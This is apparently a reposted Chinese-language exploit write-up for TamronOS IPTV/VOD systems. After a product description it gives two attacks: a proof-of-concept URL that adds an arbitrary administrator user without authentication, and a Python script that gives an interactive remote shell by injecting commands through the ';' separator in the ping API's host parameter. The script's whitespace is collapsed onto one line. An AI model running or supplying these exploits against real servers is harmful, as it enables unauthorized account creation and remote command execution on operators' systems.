本文章仅供参考,请勿用于非法入侵,后果自负。
TamronOS IPTV/VOD系统是一套基于Linux内核开发的宽带运营商、酒店、学校直播点播一体解决方案,系统提供了多种客户端(Android机顶盒、电视、PC版点播、手机版点播)方便用户通过不同的设备接入。同时系统支持多种节目源接入(卫星源、广电源、运营商IPTV源、网络源、自办频道、编码器等其他第三方设备提供的源)。基于Apple公司的HLS直播传输技术,以及我公司自主研发的动态内存切片技术,在使用 流媒体输出的同时保证了最大用户待机量(一个千兆口1500用户、一个万兆口6-8K用户),同时也是国内唯一能实现单台服务器负载140-200路直播的IPTV系统。
TamronOS IPTV系统任意用户添加修改
1. 漏洞影响版本:
TamronOS IPTV v5 3..6.6
2. 系统界面
3. 漏洞复现
验证是否存在漏洞
添加test用户,密码为123456,添加成功
成功登录
4. Poc:
/api/manager/submit?group=1&username=test&password=123456
TamronOS IPTV系统系统命令执行
由于TamronOS IPTV未对ping接口进行限制,造成了命令执行漏洞。
1. 漏洞影响版本
全版本
2. 漏洞复现
3. Poc:
import requestsimport jsonimport optparseparser = optparse.OptionParser()parser.add_option("-u","--url",dest="urls",action="store",help="Base target uri (ex. http://target-uri/)")options, args = parser.parse_args()url_Kingdee = options.urlsdef title():print("-------------------------------")print("TamronOS IPTV Command execution")print("Affected version: any")print("-------------------------------")print(" --Redus")def Poc():response = requests.get(url_Kingdee)if response.status_code == 200:flag = Truetry:while flag:cmd = input("$ ")if cmd == 'exit':exit()response = requests.get(url_Kingdee + "/api/ping?count=5&host=;" + cmd + ";&port=80&source=1.1.1.1&type=icmp")content = json.loads(response.text)dict_json = content["result"]print(dict_json)except:exit()title()Poc()
文章转载自Redus,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。
